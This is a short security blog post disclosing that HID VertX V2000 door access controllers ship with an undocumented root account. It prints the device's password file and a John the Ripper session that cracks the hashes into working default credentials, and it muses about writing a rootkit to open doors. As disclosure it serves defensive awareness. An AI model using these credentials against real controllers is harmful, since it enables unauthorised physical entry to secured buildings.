HID VertX V2000 Default Password

In my last post I showed you how to identify HID VertX controllers on the network. Once you identify them, the next step is to figure out how to gain access. That's not really difficult since they have a default password set for the root account. The VertX controller is primarily managed via the web interface which is relies on the admin account for authentication. From this web interface, you can change the password on the admin account, but never is there a mention of the root account.

The system has Telnet, HTTP, and FTP enabled by default, all of which relies on the /etc/passwd for authentication. User manuals say to use the admin account for everything, but if you look at management software provided by third parties, you'll see a lot of them use this root account for upgrading firmware and remote configuration.

As mentioned in my previous article, these systems handle physically proximity card access. Since they run Linux, I'm hoping I can find the processes that are responsible for relaying the card data from the reader to the backend, and the processes responsible for doing fun stuff like opening doors. If i can, then i bet writing a rootkit to do my bidding wouldnt be all that hard :)

Here are the goodies:


[root@VertXController /]5748# cat /etc/passwd
root:$1$$uqbusDeGY2YWqg.T2S1100:0:0:Administrator:/:/bin/sh
nobody:*:99:99:Nobody:/:
modem1:$1$$Y9rDiTVKDBq0qyRvfJnpd/:500:503:Linux User,,,:/:/bin/sh
router1:$1$$8gZZvhvWWFKJ7whpMxbQn/:501:503:Linux User,,,:/:/bin/sh
admin:$1$$qRPK7m23GJusamGpoGLby/:502:504:Linux User,,,:/:/bin/sh


The password is a tough one:


root@bt:/pentest/passwords/john# ./john vertx.passwd
Loaded 4 password hashes with no different salts (FreeBSD MD5 [32/32])
router1 (router1)
modem1 (modem1)
(admin)
pass (root)
guesses: 4 time: 0:00:00:03 100.00% (2) (ETA: Thu Jul 14 15:00:01 2011) c/s: 9390 trying: pass